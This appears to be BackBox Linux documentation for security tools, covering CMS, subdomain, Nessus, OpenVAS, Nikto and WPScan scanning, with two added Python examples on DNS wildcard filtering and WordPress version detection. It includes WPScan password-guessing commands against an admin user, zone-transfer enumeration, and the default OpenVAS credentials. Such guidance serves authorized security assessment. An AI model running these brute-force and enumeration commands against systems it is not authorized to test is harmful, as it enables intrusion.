backbox@backbox:~$ cms-explorer -url http://example.com/ -v 1 -bsproxy localhost:8080 -explore -type wordpress

Test for Wordpress themes on example.com using themelist.txt, with full verbosity and explore
using the bootstrap proxy on port 80 of localhost.
backbox@backbox:~$ cms-explorer -url http://example.com/ -v 3 -bsproxy localhost -explore -themes -themefile themelist.txt -type wordpress

Test for Drupal plugins/themes on example.com, with normal verbosity and no exploration.
backbox@backbox:~$ cms-explorer -url http://example.com/ -type drupal

Test for Mambo (or Joomla) components/modules and templates, and search OSVDB.
backbox@backbox:~$ cms-explorer -url http://example.com/ -type joomla -osvdb

Category: Web Applications Analysis

Knock

Knock
Source code web site: http://code.google.com/p/knock/

Description
Knock is a Python script, written by Gianni 'guelfoweb' Amato, designed to enumerate subdomains
of a target domain using a wordlist.

Usage
backbox@backbox:~$ knock <option> <url>

Rapid Scan
Scanning with internal wordlist:
backbox@backbox:~$ knock <url>
Scanning with external wordlist:
backbox@backbox:~$ knock <url> <wordlist>

Options
-zt Zone Transfer discovery:
backbox@backbox:~$ knock -zt <url>
-dns Dns resolver:
backbox@backbox:~$ knock -dns <url>
-wc Wildcard testing:
backbox@backbox:~$ knock -wc <url>
-bw Wildcard bypass:
backbox@backbox:~$ knock -bw <stringexclude> <url>

Example
backbox@backbox:~$ knock -dns http://www.google.it
Knock v1.5 by Gianni 'guelfoweb' Amato ( http://knock.googlecode.com )

[+] Testing domain
www.www.google.it 212.48.8.140

[+] Dns resolving
Domain name                 Ip address      Name server
http://www.google.it    74.125.39.105   fx-in-f105.1e100.net
http://www.google.it    74.125.39.106   fx-in-f106.1e100.net
http://www.google.it    74.125.39.147   fx-in-f147.1e100.net
http://www.google.it    74.125.39.99    fx-in-f99.1e100.net
http://www.google.it    74.125.39.103   fx-in-f103.1e100.net
http://www.google.it    74.125.39.104   fx-in-f104.1e100.net
Found 6 host(s) for http://www.google.it
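Knock's -wc and -bw options exist because a wildcard record in the zone makes every guessed label resolve, so a wordlist scan would report nothing but false positives. The following is an added Python example, not Knock's own code, showing how the wildcard check and the filtering work; the resolver, the records and the TEST-NET addresses are constructed so it runs offline (pass system_resolve for real lookups).

```python
import random
import socket
import string

# Constructed records standing in for a real zone so the example runs offline.
# Any label under example.com that is not listed resolves to the wildcard
# address 203.0.113.9 (TEST-NET-3 documentation range).
FAKE_RECORDS = {
    "www.example.com": ["203.0.113.10"],
    "mail.example.com": ["203.0.113.20"],
    "dev.example.com": ["203.0.113.9"],  # real host sharing the wildcard address
}
WILDCARD_ANSWER = ["203.0.113.9"]


def fake_resolve(name):
    """Offline resolver: return A records for name, emulating a wildcard zone."""
    if name in FAKE_RECORDS:
        return FAKE_RECORDS[name]
    if name.endswith(".example.com"):
        return WILDCARD_ANSWER
    raise socket.gaierror("no such host")


def system_resolve(name):
    """Live resolver using the OS: list of IPv4 addresses for name."""
    return socket.gethostbyname_ex(name)[2]


def detect_wildcard(domain, resolve, attempts=3):
    """Resolve random labels under domain (the idea behind knock's -wc).

    Returns the set of addresses that non-existent names resolve to; an empty
    set means the zone has no wildcard record."""
    alphabet = string.ascii_lowercase + string.digits
    hits = set()
    for _ in range(attempts):
        label = "".join(random.choice(alphabet) for _ in range(16))
        try:
            hits.update(resolve(f"{label}.{domain}"))
        except socket.gaierror:
            pass
    return hits


def enumerate_subdomains(domain, wordlist, resolve=system_resolve):
    """Resolve each word as a subdomain, dropping wildcard-only answers.

    Returns (found, wildcard_ips, discarded): found maps hostname -> addresses
    for names with at least one non-wildcard address; discarded lists names
    whose every address belongs to the wildcard and so cannot be confirmed."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found, discarded = {}, []
    for word in wordlist:
        host = f"{word}.{domain}"
        try:
            ips = resolve(host)
        except socket.gaierror:
            continue  # NXDOMAIN: the name does not exist
        if wildcard_ips and set(ips) <= wildcard_ips:
            discarded.append(host)
            continue
        found[host] = ips
    return found, wildcard_ips, discarded
```

The sample data also shows the cost of the filter: dev.example.com is a real host that shares the wildcard address, so it is discarded together with the bad guesses (the filter trades false positives for possible false negatives).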

Category: Network Analysis

Modifying BackBox packages


Enable the source code repository:
backbox@backbox:~$ sudo nano /etc/apt/sources.list.d/backbox-two-natty.list
add the following string:
deb-src http://ppa.launchpad.net/backbox/two/ubuntu natty main

In our example we'll customize the weevely tool. Type the following commands in a terminal:
backbox@backbox:~$ sudo apt-get update
backbox@backbox:~$ apt-get source weevely
After a few seconds you'll find the following files in your directory:
weevely_0.5-0backbox1.diff.gz
weevely_0.5-0backbox1.dsc
weevely_0.5.orig.tar.gz
and the source folder:
backbox@backbox:~$ ls weevely-0.5
After making the necessary changes, and before creating the new deb archive, some packages
need to be installed:
backbox@backbox:~$ sudo apt-get install devscripts
Open the "debian/control" file and check the build dependencies; in the example
examined:
[...]
Build-Depends: debhelper (>= 7)
[...]
After this check type on terminal:
backbox@backbox:~$ sudo apt-get install debhelper
Now the new package can be built:
backbox@backbox:~$ cd weevely-0.5
backbox@backbox:~/weevely-0.5$ debuild binary
Otherwise, if preferred, create the Debian source package to be uploaded to the Launchpad repository:
backbox@backbox:~/weevely-0.5$ debuild clean
backbox@backbox:~/weevely-0.5$ debuild -S
backbox@backbox:~/weevely-0.5$ cd ..
backbox@backbox:~$ dput ppa:user/ppa-name weevely_0.5-0backbox1_source.changes

Nessus

Background
Nessus is a powerful, up-to-date and easy to use network security scanner. It is currently rated
among the top products of its type throughout the security industry and is endorsed by professional
information security organizations such as the SANS Institute. Nessus allows you to remotely audit
a given network and determine if it has been broken into or misused in some way. Nessus also
provides the ability to locally audit a specific machine for vulnerabilities, compliance specifications,
content policy violations and more.

Installation
Download the latest version of Nessus from http://www.nessus.org/download/. Confirm the
integrity of the installation package by comparing the MD5 checksum of the download with the one listed
in the MD5.asc file.
Use one of the appropriate commands below that corresponds to the version of Ubuntu you are
running:
sudo dpkg -i Nessus-4.4.0-ubuntu1010_amd64.deb
sudo dpkg -i Nessus-4.4.0-ubuntu1010_i386.deb

Configuration
Create a Nessus User
At a minimum, create one Nessus user so client utilities can log into Nessus to initiate scans and
retrieve results.
For password authentication use the nessus-adduser command to add users. For the first user
created, it is recommended to be the admin user.
sudo /opt/nessus/sbin/nessus-adduser
Login : backbox
Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins,
etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts that
backbox has the right to test. For instance, you may want him to be able
to scan his own host only.
Please see the nessus-adduser manual for the rules syntax
Enter the rules for this user, and enter a BLANK LINE once you are done:
(the user can have an empty rules set)
Login : backbox
Password : ***********
This user will have 'admin' privileges within the Nessus server
Rules :
Is that ok ? (y/n) [y] y
User added

Installing the Plugin Activation Code
Before Nessus starts for the first time, you must provide an Activation Code to download the
current plugins. The initial download and processing of plugins will require extra time before the
Nessus server is ready.
Depending on your subscription service, you will have received an Activation Code that entitles you
to receive either the ProfessionalFeed or the HomeFeed plugins. This synchronizes your Nessus
scanner with all available plugins. Activation Codes may be 16 or 20 character alpha-numeric
strings with dashes.
To register for the HomeFeed, visit http://www.nessus.org/register/ and register your copy of
Nessus to use the HomeFeed.
To install the Activation Code, type the following command on the system running Nessus,
where XXXX-XXXX-XXXX-XXXX-XXXX is the registration code that you received:
sudo /opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX-XXXX
Your activation code has been registered properly thank you.
Now fetching the newest plugin set from plugins.nessus.org...
Your Nessus installation is now up-to-date.
If auto_update is set to 'yes' in nessusd.conf, Nessus will
update the plugins by itself.

Start / Stop / Restart the Nessus daemon
Start, stop or restart the Nessus service as root with the following command:
sudo /etc/init.d/nessusd { start | stop | restart }
or simply:
Services --> nessus --> nessusd { start | stop | restart }

Updating plugins
The following command is used to update the Nessus scanner with the most recent plugins:
sudo /opt/nessus/sbin/nessus-update-plugins
The first time Nessus updates and processes the plugins, it may take several minutes. The web
server will show a "Nessus is initializing." message and will reload when ready.

Connecting with a client
Once the installation has finished and the plugins have been updated and processed, the Nessus
server is ready to be connected to by a client. Tenable supports access to the Nessus server
through a native web server:
https://localhost:8834/
To do that, navigate through the BackBox menu:
Auditing > Vulnerability Assessment > Network Assessment > Nessus
The first time you connect to the web interface, your browser may display a warning about an
untrusted connection. This is due to Nessus shipping with a default SSL certificate. More
information on this can be found in the Nessus User Guide.

Removing Nessus
sudo apt-get purge nessus

Category: Network Assessment

Nexpose

The Nexpose Community Edition is a free, single-user vulnerability management solution specifically
designed for very small organizations or individual use.

Download and Installation
Let's start by getting the free Community Edition for personal use from:
http://www.rapid7.com/vulnerability-scanner.jsp
The installation process is the same for 32-bit and 64-bit architectures. It depends on some
libraries/tools, so let's install these dependencies first.
It requires the following packages.
screen
libstdc++5 (32-bit only)
Then proceed with:
sudo -i
apt-get install screen && apt-get install libstdc++5
wget http://download2.rapid7.com/download/NeXpose-v4/NeXposeSetup-Linux32.bin
chmod +x NeXposeSetup-Linux32.bin
./NeXposeSetup-Linux32.bin -c
The installer will display some information and prompt you for confirmation about Nexpose. Just go
ahead by typing y and then pressing ENTER. Once the above process is done you will be asked about the
creation of an account to get a NeXpose user key. Check your mail for the product key that you
registered for and go forward.

Minimum System Requirements
Nexpose Community Edition recommends the following system requirements:
2 GHz processor or higher
2-4 GB RAM (32-bit), 4-8 GB RAM (64-bit)
10 GB+ available disk space
English operating systems with English/United States regional settings
100 Mbps network interface card
Category: Network Assessment

Nikto
Nikto Web Scanner
Home page: http://cirt.net/nikto2
Basic Usage: http://cirt.net/nikto2-docs/usage.html

Description
Nikto is an open source tool written in Perl. It is used for vulnerability assessment and auditing
of web sites, and works with a large database of vulnerabilities that is updated monthly.

Usage
nikto -Help
Shows the tool options.

Example Usage
nikto -h WEB_SITE
With this command, nikto scans "WEB_SITE" on port 80.
If you want a specific port:
nikto -h WEB_SITE -p PORT
where instead of "PORT" you write the port you want to scan.
If you want to scan several ports:
nikto -h WEB_SITE -p PORT1,PORT2,PORT3
Add the -ssl option if the scanned host uses HTTPS.
You can choose which kinds of bugs you want to look for with the -Tuning parameter:
nikto -Tuning 123 -h localhost
This is the list of test categories supported by Nikto:
0 - File Upload
1 - Interesting File / Seen in logs
2 - Misconfiguration / Default File
3 - Information Disclosure
4 - Injection (XSS/Script/HTML)
5 - Remote File Retrieval - Inside Web Root
6 - Denial of Service
7 - Remote File Retrieval - Server Wide
8 - Command Execution / Remote Shell
9 - SQL Injection
a - Authentication Bypass
b - Software Identification
g - Generic (Don't rely on banner)
x - Reverse Tuning Options (i.e., include all except specified)
Update nikto:
nikto -update
This software is used to find bugs, not to exploit them.
Category: Web Application Assessment

OpenVAS

The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and
tools offering a comprehensive and powerful vulnerability scanning and vulnerability management
solution.
The actual security scanner is accompanied with a daily updated feed of Network Vulnerability
Tests (NVTs), over 30,000 in total (as of April 2013).
All OpenVAS products are Free Software. Most components are licensed under the GNU General
Public License (GNU GPL).
The core of this SSL-secured service-oriented architecture is the OpenVAS Scanner. The scanner
very efficiently executes the actual Network Vulnerability Tests (NVTs) which are served with daily
updates via the OpenVAS NVT Feed or via a commercial feed service.
The OpenVAS Manager is the central service that consolidates plain vulnerability scanning into a
full vulnerability management solution. The Manager controls the Scanner via OTP (OpenVAS
Transfer Protocol) and itself offers the XML-based, stateless OpenVAS Management Protocol
(OMP). All intelligence is implemented in the Manager so that it is possible to implement various
lean clients that will behave consistently e.g. with regard to filtering or sorting scan results. The
Manager also controls a SQL database (sqlite-based) where all configuration and scan result data is
centrally stored.
The Greenbone Security Assistant (GSA) is a lean web service offering a user interface for web
browsers. GSA uses an XSL transformation stylesheet that converts OMP responses into HTML.
OpenVAS CLI contains the command line tool "omp", which makes it possible to create batch processes to
drive the OpenVAS Manager.
The OpenVAS Administrator acts as a command line tool or as a full service daemon offering the
OpenVAS Administration Protocol (OAP). Its most important tasks are user management and
feed management. GSA supports OAP, and users with the role "Admin" can access the OAP
functionality.

Quick Install
With the default installation of BackBox some users may experience issues when starting
OpenVAS. If that is the case, the fix is to update the tool, following these instructions
from a terminal:

sudo -s
openvas-service stop
apt-get purge greenbone-security-assistant openvas-cli openvas-manager openvas-scanner openvas-administrator
apt-get autoremove --purge
rm -rf /var/lib/openvas/
apt-get update
apt-get dist-upgrade
apt-get install greenbone-security-assistant openvas-cli openvas-manager openvas-scanner openvas-administrator sqlite3 xsltproc rsync
To install support packages for generation of the reports (downloads around 30 MB of additional
packages):
apt-get install texlive-latex-base texlive-latex-extra texlive-latex-recommended htmldoc
To install support for autogenerated LSC credential packages:
apt-get install alien rpm nsis fakeroot

Quick Start
(copy and paste the whole block as user root; the first time, you will be prompted to set the
password for user "admin")
sudo -s
test -e /var/lib/openvas/CA/cacert.pem || openvas-mkcert -q
openvas-nvt-sync
test -e /var/lib/openvas/users/om || openvas-mkcert-client -n om -i
service openvas-manager stop
service openvas-scanner stop
openvassd
openvasmd --migrate
openvasmd --rebuild
openvas-scapdata-sync
openvas-certdata-sync
test -e /var/lib/openvas/users/admin || openvasad -c add_user -n admin -r Admin
killall openvassd
sleep 15
service openvas-scanner start
service openvas-manager start
service openvas-administrator restart
service greenbone-security-assistant restart

Basic Usage
To start an OpenVAS GSA session you will need to start all the related services. To do this, navigate
through the BackBox main menu and click on:
Services > openvas > openvas-services restart
or simply run from the command line:
sudo openvas-services start
then wait until the following information is displayed on your terminal:
Starting OpenVAS Scanner: openvassd.
Starting OpenVAS Manager: openvasmd.
Starting OpenVAS Administrator: openvasad.
Starting Greenbone Security Assistant: gsad.
Done.
Once the services are started you can proceed by opening the OpenVAS GSA web interface. To do
that, navigate through the menu:
Auditing > Vulnerability Assessment > Network > OpenVAS GSA
or simply open your browser at:
https://localhost:9392
Your browser will show the login interface. BackBox ships a default username (admin)
and password (backbox); enter these credentials to log into the web
application interface, and change the default password after your first login.
You will finally have the OpenVAS Web UI running and you can start to perform your scans (or
whatever you'd like to do).
Enjoy your assessment...
Category: Network Assessment

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,
software and communications protocol development, and education.

How to Run
For security reasons, it is not recommended to run Wireshark with root privileges. To run it as a
normal user, you must first run a few commands.
In a terminal (it is important that you're in a terminal, not just the Alt+F2 dialogue) run this:
$ sudo dpkg-reconfigure wireshark-common
This will ask you if you want to allow non-root users to be able to sniff. That's what we're aiming for, so
select Yes and hit return.
This adds a wireshark group. Anybody in that group will be able to sniff without being root.
Add your username to the wireshark group:
$ sudo adduser $USER wireshark
Log out of your system and log in again.
Now open a terminal and run:
$ wireshark
or click on BackBox Menu:
Auditing -> Privilege Escalation -> Sniffing -> Wireshark
and select the interface to sniff.
Category: Sniffing

Wpscan

WPScan - Wordpress Security Scanner
Source code web site: http://code.google.com/p/wpscan/

Description
WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known
security weaknesses within WordPress installations. It is intended to be used by security
professionals or WordPress administrators to assess the security posture of their WordPress
installations. The code base is Open Source and licensed under the GPLv3.
Features include:
Username enumeration (from author)
Weak password cracking (multithreaded)
Version enumeration (from generator meta tag)
Vulnerability enumeration (based on version)
Plugin enumeration (todo)
Plugin vulnerability enumeration (based on version) (todo)
Other miscellaneous checks

Example usage
wpscan.rb --url www.example.com
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
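WPScan's version enumeration relies on the generator meta tag that WordPress emits in the page head. The following is an added Python example, not WPScan's own code, that a site administrator can run against the source of their own page to see whether it exposes a version and whether that version is older than a chosen baseline; the HTML samples are constructed.

```python
import re
from html.parser import HTMLParser

# Constructed sample pages (not captured from any real site).
SAMPLE_LEAKING = """<!DOCTYPE html><html><head>
<meta charset="utf-8">
<META NAME="Generator" CONTENT="WordPress 3.5.1">
<title>Blog</title></head><body></body></html>"""

SAMPLE_HARDENED = """<!DOCTYPE html><html><head>
<meta name="generator" content="WordPress">
<title>Blog</title></head><body></body></html>"""

SAMPLE_OTHER_CMS = "<html><head><meta name='generator' content='Drupal 7'></head></html>"


class _GeneratorTags(HTMLParser):
    """Collect the content attribute of every <meta name="generator"> tag.

    HTMLParser already lowercases tag and attribute names; attribute values
    are compared case-insensitively below."""

    def __init__(self):
        super().__init__()
        self.generators = []

    def handle_starttag(self, tag, attrs):
        if tag != "meta":
            return
        attributes = {name: (value or "") for name, value in attrs}
        if attributes.get("name", "").lower() == "generator":
            self.generators.append(attributes.get("content", ""))


def wordpress_version(html):
    """Version string advertised by the WordPress generator tag.

    Returns None if no WordPress generator tag is present, and "" if the tag
    is present but carries no version number."""
    parser = _GeneratorTags()
    parser.feed(html)
    for content in parser.generators:
        match = re.match(r"\s*WordPress(?:\s+(\d+(?:\.\d+)*))?", content, re.IGNORECASE)
        if match:
            return match.group(1) or ""
    return None


def version_tuple(version):
    """'3.5.1' -> (3, 5, 1), so versions compare numerically rather than as text."""
    return tuple(int(part) for part in version.split("."))


def is_outdated(version, current):
    """True when version is older than current (e.g. '3.5.1' vs '3.5.2')."""
    return version_tuple(version) < version_tuple(current)


def assess_site(html, current):
    """Summarise what the generator tag tells a scanner about this page:
    whether WordPress is detected, whether a version is exposed, and whether
    that version is older than the baseline passed as current."""
    version = wordpress_version(html)
    return {
        "wordpress_detected": version is not None,
        "version_exposed": bool(version),
        "outdated": bool(version) and is_outdated(version, current),
        "version": version,
    }
```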

Category: Web Applications Exploitation
